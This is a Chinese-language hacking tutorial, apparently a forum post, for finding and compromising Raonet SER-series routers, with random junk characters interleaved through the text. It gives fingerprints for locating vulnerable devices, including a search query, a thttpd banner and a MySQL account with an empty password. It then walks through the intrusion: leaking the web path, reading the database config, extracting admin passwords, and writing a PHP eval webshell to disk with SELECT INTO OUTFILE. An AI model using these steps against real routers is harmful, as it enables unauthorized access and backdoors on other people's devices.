寻找存在漏洞的路由器方法:+ @# d0 V2 u$ M9 M/ A
. J. l" v( S' j4 w1:google搜索'Raonet Subscriber Ethernet Router'
2 ^& w3 X8 X3 U' q8 W
3 M# R; R3 ~% o2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001$ |$ H" g- k0 X
% \9 i6 j( o6 r4 |8 d8 K3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
; [3 d7 ]- p4 f) Y. `" F! W3 \6 E5 T$ o/ e, n0 g, n
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
% U/ ?! Q7 @% J1 K% k% _) N' g6 j% c+ T
0 @7 b }5 r4 ?$ l: k7 W5 ~* }4 r
3 b5 u! ~+ f/ ]: u; e Q$ x入侵步骤:
2 y. m! V/ z( z2 j8 o# k4 ^3 E- J3 |" ]5 n6 O8 }5 M' O
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
8 Q3 @' P/ |& F, H- p4 |" S" R( a; Q2 h7 u. w! d) p$ z5 q
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
; ]9 w7 W0 k e3:得到密码后连接,查看GUI管理密码:
- ?8 {' J, u7 [, O) Z* t: buse ser_500, K& |6 X1 ?8 {, g6 \
select id,passwd from user;
( |# `: [4 _# q; Z4:通过数据库写入webshell,执行命令:9 l( ]+ U, L( K
use mysql;
5 V5 m1 C: y7 G3 pcreate table ok(cmd TEXT);
, [* ]. `9 ?/ E+ K, V# rinsert into ok values("<?php @eval($_POST[cmd])?>");' b: i& z* z' a3 A0 B7 O( c, x
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";0 c; K( E/ r' z& j7 I
drop table ok;
4 H4 A' [/ K* x9 z) s+ o! k$ D! `" W% u+ @
5:连接后门shell.php
1 K4 ?/ w; W. g2 Y9 Z- C3 [" b1 Y1 B1 {. u4 C3 Y9 X- b- x
6. 搞定!
8 w* O2 `5 [% `: [6 d# G |1 `: i6 I& t
|